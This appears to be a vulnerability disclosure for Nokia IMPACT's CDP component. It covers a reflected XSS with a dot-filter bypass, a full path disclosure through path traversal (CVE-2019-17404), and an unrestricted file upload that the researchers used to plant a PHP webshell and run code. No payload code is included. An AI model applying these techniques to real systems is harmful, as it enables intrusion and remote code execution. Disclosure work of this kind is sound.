A Reflected Self Reflected Cross Site Scripting was found in the Manual Page of Nokia CDP at https://[host]/ui/help/en_US/[redacted]ConsoleHelp/index
The payload used is shown on the left (click here to enlarge the image).
There is a filter in the input that removes the . but we managed to bypass it accessing cookie as key of document.
Vulnerability Description: Full Path Disclosure
Software Version: NOKIA IMPACT < 18A
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-17404
CVSv3: 4.3
Severity: Medium
Credits: Francesco Giordano, Alessandro Sabetta, Massimiliano Brolli
An authenticated user with access to the CDP component of NOKIA IMPACT is able to leak the full path of the installation. In particular, the massive device upload feature (devceimport) releases detailed information about the location where the files are saved within the application filesystem.
If the path traversal is exploited to point to a non-existent path the application will throw an unhandled exception, leaking the full path of where the files are saved (Full path disclosure)
Vulnerability Description: Unrestricted File Upload
Software Version: NOKIA IMPACT < 18A
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-17403
CVSv3: 8.8
Severity: High
Credits: Francesco Giordano, Alessandro Sabetta, Massimiliano Brolli
An authenticated user with access to the CDP component of NOKIA IMPACT is able to upload files with arbitrary extensions.
The deviceImport function parses every file received with a csv_parse function. We managed to load a non-csv file adding at the beginning of it the following line followed by our payload.
We uploaded PHP Webshell in a path served by Apache (in our case /opt/[redacted]/5/) and got code execution as apache user.